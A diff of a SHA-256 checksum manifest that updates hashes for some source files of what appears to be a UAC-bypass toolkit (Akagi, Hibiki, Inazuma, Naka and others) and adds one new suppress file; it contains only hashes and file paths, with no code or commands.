@@ -18,7 +18,7 @@ a8ec3b9411f2408b5cfa4b0c77aa045957d3144aebd343cfa7da03d78226e3b3 *Source\Akagi\m
bd7f1ebd11ed2313bef81c4701b2444ab37d9723493bfeb9de5db2063a5213e2 *Source\Akagi\makecab.h
f1b82b53b74b4586c58b0e3a87aceb1ee43e493ef58aa9490297c6bbef247de0 *Source\Akagi\manifest.h
c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h
-d590ad1ea548b06e8cd897742fe94f7e5aad08438baa02131ab41ef5669b7b0e *Source\Akagi\Resource.rc
+dae1ff25ab3cfa35aacd0eb1aace255ab4aa2c578d656fb81b13664d02d176e3 *Source\Akagi\Resource.rc
1cf5e1ebaf5cfb80b420fb87ff8f7d31a2b9b75dc338edb4ea6820c4beeaf36c *Source\Akagi\sup.c
37953ab7189a09fce908de75b5ce2871aaad5a04c78dca833e13318d93ece3a8 *Source\Akagi\sup.h
a13d31cf040775c51471e3fe6b4863d879fefb189798a24f76189abaebdbdf27 *Source\Akagi\uacme.suppress
@@ -43,7 +43,7 @@ c994f782c64a1a18caaab60418de573ade7e87fdc964e25557ac79eb549c7cd5 *Source\Akagi\m
d9ac1c8eedf9c9d5ed6cbf0ffeeaa13ba376760ade0d1dc6750121ed48a5b63b *Source\Akagi\methods\carberp.h
0182da81c73323b843725eaec652ec2f2c95231e302b765de2ce37e09c899ab9 *Source\Akagi\methods\comet.c
7619c01b21279a0f318e7f3c091f5b54f9a37425b4a083e277e0adfc11da2913 *Source\Akagi\methods\comet.h
-07370a4fdfa4cc13ca49ab07bd40aff981015c79c44e1d8f30c658cb83a7ad3a *Source\Akagi\methods\enigma0x3.c
+393ba6fbfe154be58e018066bb2edcce2abb2b6bc3a209de23a279a0edde153e *Source\Akagi\methods\enigma0x3.c
878dd7452a54e15999a0eab9dc22c4bc7cbb5e5b5e71cfece307349eb79e4dc5 *Source\Akagi\methods\enigma0x3.h
e297e3858f2754f7d45876c087d606a2b10e6007ff96fdc00e27db6c731f163c *Source\Akagi\methods\explife.c
1b3b895fa6b99df9055b6514e8dc5212ce61cd7d2500c2fea95085440e7b5b34 *Source\Akagi\methods\explife.h
@@ -51,8 +51,8 @@ be58d05b4f21e4cbc7a06d409c2f0002eee660d8a9017b1d103f35cdb7d9461c *Source\Akagi\m
7a01e30bf58f6e87112812e11fd81e250ecfadfe9fb1206e9f4ec06607dad714 *Source\Akagi\methods\gootkit.h
5887a1083e6343ea5e6effbd0def4631fc988df14e0a4c2147d68cb70e90fcf2 *Source\Akagi\methods\hybrids.c
6327a9b8e9c19adee0d56e666756dd4a0edcc327c8ed0341f11bb80e12feaaa5 *Source\Akagi\methods\hybrids.h
-4fc2df6c52750c4f248795620ed5707dc52cc07647a63d1bffdb73ba48105f02 *Source\Akagi\methods\methods.c
-d105d38ed85bc199d62f2d185f8887b7c3fb098212ab944a835619f72add91e5 *Source\Akagi\methods\methods.h
+3155b7598ca2aad4e77a48f0351a8436c8780384820e83422bd8c2afb12a4586 *Source\Akagi\methods\methods.c
+adb791a9ef390b95f6f603c6e88c619c5031f42724843681b1562b9356d4d65a *Source\Akagi\methods\methods.h
fd7e8e20de8f3763a418368431c0b6b7131d940e7b775c165b095f78386b849b *Source\Akagi\methods\pitou.c
9754f1d2195c6d2ef6a228677d1a8fb8e92318aece0c389b3f28a87eeffe9827 *Source\Akagi\methods\pitou.h
3dd668663873b0e7816a2d2e89fb53ae2a418b1338b6530a9e3a1743e8bbd3fd *Source\Akagi\methods\sandworm.c
@@ -60,8 +60,8 @@ a38afbbd8ff528662d4f61ea1f688f44778f524d18dcc08badbd182b6537d7a5 *Source\Akagi\m
629be7ba979bcf0133b6a222ac358d7c9f3b4fe2f341d284a969b1a279b7dc0e *Source\Akagi\methods\simda.c
3c3a6eb8ee56ccffedd490e87b8a2fdec7e4b09bdb2650d231f2805a27e56ade *Source\Akagi\methods\simda.h
8d95d0c5a788964202100208749ab9744180f0ea36fa222a4a3adc1d0e3f90a1 *Source\Akagi\methods\sirefef.h
-2fac6223bf4efb175c214f6a18fb235dae72b378db85a4e77cab58c6c0cba7e0 *Source\Akagi\methods\tyranid.c
-781e60e1e3e89a566b11a346ae111fb95940bdcb2565da249e1f1885ca0612f8 *Source\Akagi\methods\tyranid.h
+813c594498f7f79e160f0775a6886fff179e43416e7aa79709bd779ffde9e582 *Source\Akagi\methods\tyranid.c
+233335679cbdb8023211a848051420a7e9a02b72c0af89ff0e5eb19fc018edb4 *Source\Akagi\methods\tyranid.h
7266faf9d86af33e32023964bb666bb5fb5288586a38992f020796b75c0e9b15 *Source\Akagi\tests\test.c
b073f6d614bcdc345db660edf36784d1587e3f3ab309bfb871a0ce510faa57a6 *Source\Akagi\tests\test.h
09bd7cf61a0e2bf4474e8a11f88ba61f62fe26138acabc7bac71d336232285fc *Source\Akatsuki\akatsuki.suppress
@@ -83,6 +83,7 @@ a2b59d06ad6f6af9ac19b5b15c987c246eb059eade447b63c3113646c6ef52a0 *Source\Fubuki\
1d5b354a2f9225c3e410b3fc43bf8e9984de8fff8221c9f532483d22e54ab42f *Source\Fubuki\version.rc
eccff5e3d98818d8ea5393d86379985c8eee5b0ac44d06e1c8b52b29d96cf066 *Source\Fubuki\wbemcomn.h
039659963ca2e567fe2a2c074c068a5b6ae11ce6664f319f10755f6ea4ff681b *Source\Hibiki\dllmain.c
+fc32b236825eaad7806a7cbed561f751496deace5cc0a3b72856d934c879a31a *Source\Hibiki\hibiki.suppress
1df0cd6cef001334dbe6877d8a68d34089f6a0f11dcebc7f1d08d3835d50cd8b *Source\Hibiki\Hibiki.vcxproj
eaf764a71dca55552f81e54f864acf78bb081b8d42de8cfcf67c69347a297809 *Source\Hibiki\Hibiki.vcxproj.filters
cb5688faa7cfe99a609ecdb7131f218628dbe34b8fb39ba83a2328227bc63179 *Source\Hibiki\Hibiki.vcxproj.user
@@ -99,12 +100,12 @@ d196af9df08cbdaff3817f0e56bb356ae21e1dcbc6853482f14fd555e98aebb2 *Source\Ikazuch
82868f43880065610efe2dc0532876384b3f04d57a17a6f95d5fd71784cfa2db *Source\Inazuma\Inazuma.vcxproj
0cd995b29fdec206817ef1939ac1b9c1a10bc87fff80490f030097a8a0e07c49 *Source\Inazuma\Inazuma.vcxproj.filters
cb5688faa7cfe99a609ecdb7131f218628dbe34b8fb39ba83a2328227bc63179 *Source\Inazuma\Inazuma.vcxproj.user
-c77993138f2b53f7a5d133b3f874b615c0e255e1d165b9cb15d89c2c2aab0b16 *Source\Inazuma\main.c
+74f75ab22ee4c276633a0eafcbaa31b663b0106dd261ad4627fcdaa149a55751 *Source\Inazuma\main.c
6f2113fc347bee7d74be4f51732f1f182956ba172a6fa34eed9a5aa9e10d9f41 *Source\Kongou\Kongou32.dll
f3fb336afb735d40932918b52c2e8660861be9693c2911a1534b70d29a622826 *Source\Kongou\Kongou64.dll
1cae1ba300975774a60dc519d957c530bfe2443f204e28255f26af1523f56087 *Source\Naka\main.c
d96fae8d500b17819fe4426df12f68630c5178eff7006e9ea514e125592650f2 *Source\Naka\naka.suppress
-5ded12baf68520e2176fa5d61dfb22295adb6b12e4cb31f57434b2df05bfd8c8 *Source\Naka\Naka.vcxproj
+9e83a2daa3d4a17cd561676aedd0d8aef3ca4308921d3811a275055288a1c184 *Source\Naka\Naka.vcxproj
4eb5cb6614af01ec00f9e01c016484880cffb41e65790ae9924639935752b31d *Source\Naka\Naka.vcxproj.filters
abd562aa6b8721caf958b4f87b67787a82ab81b64df21c46df01f67891c37ce7 *Source\Naka\Naka.vcxproj.user
893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Shared\cmdline.c
@@ -112,7 +113,7 @@ bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Shared\
01c5aada277c3a7a138ab7c31beda0decee8ec28fe7525e43ca524b2b0270213 *Source\Shared\ldr.c
b22c6d2722fa9e917746502fd4615d28b9c889d7288fc737315150e0ae40ee6f *Source\Shared\ldr.h
107245437ed86b6f1e839b2d3d9bbadb3d9980046cb5c7001f985fed3627962f *Source\Shared\minirtl.h
-31d27cc36d83e20db9ea6fbe35e395e18568403c806bb43707bd228f569dea45 *Source\Shared\ntos.h
+5d1e45dfb65548af3fa7e13792d4cca37ddbb8324e7ec1c21fd9a6d9ea49922f *Source\Shared\ntos.h
3fccfae61f8e59435c180be88cb46967361ed61ec1314532dddabf12679902b1 *Source\Shared\ntsxs.h
b9de99d3447bb1a125cb92aa1b3f9b56a59522436f1a1a97f23aac9cee90341c *Source\Shared\rtltypes.h
ca0b7a38be2f3f63a69aca6da7b3a62a59fcefee92de00e9796f68d4a2a23158 *Source\Shared\strtoi.c